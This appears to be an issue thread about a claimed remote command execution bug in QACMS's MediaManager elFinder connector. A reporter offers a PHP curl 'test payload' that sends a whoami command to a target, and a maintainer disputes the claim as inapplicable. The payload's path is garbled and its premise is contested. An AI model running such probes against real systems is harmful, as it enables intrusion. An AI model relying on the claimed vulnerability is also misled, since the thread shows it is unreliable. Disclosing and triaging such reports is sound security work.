Command Excution can allowed attacker excute remote command

[FStac]

plugins/MediaManager/src/Lib/ElFinder/connector.minimal.php
line53:
$src = $_POST : $_GET;
line64:
$cmd = $src['cmd'] : '';
line103:
elFinder->exec($cmd, $this->input_filter($args));

even using input_filter() to filter $src at line150 with magic_quotes_gpc,str_replace and stripslashes,but it also can be bypass $src also can allow attacker input a command to excute.

TEST PAYLOAD:

<?php
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/F:wampwwwcms-2.0pluginsMediaManagersrcLibElFinderelFinderConnector.class.php?x=whoami");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

[botchris]

File connector.minimal.php is not used as part of QACMS, just there as part of vendor package. And as far as I know, elFinder::exec() is aimed to "execute" elFinder's API commands and no O.S. command, so I dont get what you mean by "excute remote command".

In the other hand, the test payload using CURL directly over a PHP file class is not even possible in QACMS, so I dont get what this proves.

Similar to: https://github.com/Studio-42/elFinder/issues/1018